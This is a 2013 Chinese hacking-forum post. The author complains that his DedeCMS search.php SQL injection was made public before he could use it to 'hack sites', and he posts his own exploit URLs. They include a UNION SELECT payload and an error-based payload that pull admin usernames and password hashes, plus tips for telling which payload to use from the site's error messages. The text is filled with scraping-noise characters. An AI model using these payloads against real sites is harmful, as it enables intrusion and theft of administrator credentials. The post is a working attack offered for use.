转载不加作者名的没JJ
# `# ~) g$ A; y& M
/ R [ r& v- l, q9 P% m8 i哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
) r& c& C2 Z) \) G! O( L) O; S7 _, Q& m0 G+ g1 X
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
( `- J2 o5 [1 S
3 N k! K* G I6 ?- k5 l我一般是这样测试的:+ [' x: @$ o0 ?* m2 q! r0 v
! j% p9 z/ V/ k/ |2 Y+ p) {2 H# t
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a0 G- D" A9 S& a# `- C' b; A5 @
: @, E' U: T" D+ j& A" j转载不加作者名的没JJ
- M3 B3 R% O- H" V5 l
8 ~, n" F0 {" b; }9 @; X5 ^作者:鬼哥
* I, Y. x ^' C3 {/ |2 _2 |
! j, j& z/ @3 F: C7 z7 C& {8 N
9 ?% Z( h8 x+ s6 L% w1 j
5 x8 C9 G4 V# Z$ D! I& [看结果如果提示7 n: _6 e/ M* P( ^" h/ E
7 P4 X7 ^2 `9 K; O$ { Z ySafe Alert: Request Error step 2 !
7 f: r! b# I* @( F; J5 n G" P- w) |% n, `8 g0 X2 _
那么直接用下面的exp
: G/ {; _4 O4 V; W, a- t
l; ~+ r7 {/ y. sxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
/ q* X0 l/ d' t1 K$ D$ v
" w+ T5 B7 \! g
' Z0 Z2 r Y) ?: u看结果如果提示# e7 q" { D" h- n# E
, W/ T2 \# E9 \) d! u- |0 S pSafe Alert: Request Error step 1 !9 f# k) W) J+ j- X+ F- u
* }( f) O# p* Y2 Q( X; m% D0 D那么直接用下面的exp- f' B: _, D" ~; r2 K6 k
, J" X Z7 G; |+ }5 h( d% L) H
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a+ `4 b4 j8 a$ s& U2 Q$ q
- Q+ F/ ~( X1 n- h; c- h/ _6 _% j( f- B6 G6 x% F, j
如果正常显示证明漏洞不存在了。
6 z' Q5 y" Y: I7 ]; {+ l" s
* @0 T; i( ~" P+ J" B) R! B转载不加作者名的没JJ |
发表于 2013-1-21 08:45:22
收藏
支持
反对